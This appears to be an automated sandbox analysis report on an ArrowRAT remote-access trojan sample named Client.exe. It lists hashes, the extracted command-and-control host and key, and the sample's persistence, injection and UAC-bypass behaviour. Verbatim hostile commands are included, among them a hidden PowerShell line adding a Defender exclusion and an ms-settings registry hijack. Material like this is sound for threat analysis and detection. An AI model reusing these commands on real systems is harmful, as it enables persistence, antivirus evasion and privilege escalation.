Analysis
- max time kernel: 127s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 01-08-2024 11:18
Behavioral task behavioral1
- Sample: Client.exe
- Resource: win7-20240705-en
Behavioral task behavioral2
- Sample: Client.exe
- Resource: win10v2004-20240730-en
General
- Target: Client.exe
- Size: 158KB
- MD5: ed0eb58e701a62ef732db4bb2223565e
- SHA1: 882f556e08047535c88f33eb7a53652134d1081f
- SHA256: 01b5d985ba53c1d789b144694e179d04c8c0ff95e88659ce9e8b9b6e77f357ff
- SHA512: f7395647176b2a3ff456eda2924bb2fa3fe507bacf93933bfb0588c03a7a87ab8b0339ca2f8b258a9acb7b5d68cd8aae948382251ea274e0dd8d81360890ced2
- SSDEEP: 3072:wbziH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPYdO8Y:wbzie0ODhTEPgnjuIJzo+PPcfPYQ8
Malware Config
Extracted: arrowrat
- Client1
- and-statements.gl.at.ply.gg:43442
- JeaMEllZK
Signatures

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes:
- Client.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Pan\\dora"
Boot or Logon Autostart Execution: Active Setup (2 TTPs, 1 IoC)
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Processes:
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Active Setup\Installed Components
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Modifies registry class (11 IoCs)
Processes:
- explorer.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots
- Client.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings
- Client.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell
- Client.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Pan\\dora'"
- Client.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_Classes\Local Settings
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell
- explorer.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
- Client.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open\command
- Client.exe: Key created \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\ms-settings\shell\open
- explorer.exe: Set value (data) \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff
Suspicious behavior: EnumeratesProcesses (22 IoCs)
Processes:
- PID 2764 Client.exe (22 entries)
Suspicious use of AdjustPrivilegeToken (12 IoCs)
Processes:
- Token: SeDebugPrivilege, PID 2764 Client.exe (1 entry)
- Token: SeShutdownPrivilege, PID 2756 explorer.exe (11 entries)
Suspicious use of FindShellTrayWindow (27 IoCs)
Processes:
- PID 2756 explorer.exe (27 entries)
Suspicious use of SendNotifyMessage (17 IoCs)
Processes:
- PID 2756 explorer.exe (17 entries)
Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
- PID 2764 Client.exe
Suspicious use of WriteProcessMemory (49 IoCs)
Processes (source PID and process, target PID and process, number of entries):
- PID 2764 Client.exe wrote to memory of PID 2756 explorer.exe (3 entries)
- PID 2764 Client.exe wrote to memory of PID 2672 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2688 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2972 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2788 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2696 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2568 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2852 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 1168 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2680 cvtres.exe (4 entries)
- PID 2764 Client.exe wrote to memory of PID 2776 cvtres.exe (4 entries)
- PID 2756 explorer.exe wrote to memory of PID 2916 ctfmon.exe (3 entries)
- PID 2764 Client.exe wrote to memory of PID 2700 ComputerDefaults.exe (3 entries)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (image path, command line, PID; signatures and child processes indented beneath each parent)
- C:\Users\Admin\AppData\Local\Temp\Client.exe, command line "C:\Users\Admin\AppData\Local\Temp\Client.exe", PID 2764
  - Modifies WinLogon for persistence
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\explorer.exe, command line "C:\Windows\explorer.exe", PID 2756
    - Boot or Logon Autostart Execution: Active Setup
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\ctfmon.exe, command line ctfmon.exe, PID 2916
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2672
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2688
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2972
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2788
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2696
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2568
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2852
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 1168
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2680
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client1 and-statements.gl.at.ply.gg 43442 JeaMEllZK, PID 2776
  - C:\Windows\System32\ComputerDefaults.exe, command line "C:\Windows\System32\ComputerDefaults.exe", PID 2700
Network
MITRE ATT&CK Enterprise v15
Downloads (memory dumps, with file size)
- memory/2756-9-0x00000000029C0000-0x00000000029D0000-memory.dmp: 64KB
- memory/2764-0-0x000007FEF5523000-0x000007FEF5524000-memory.dmp: 4KB
- memory/2764-1-0x0000000000CD0000-0x0000000000CFE000-memory.dmp: 184KB
- memory/2764-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp: 9.9MB
- memory/2764-4-0x000007FEF5523000-0x000007FEF5524000-memory.dmp: 4KB
- memory/2764-5-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp: 9.9MB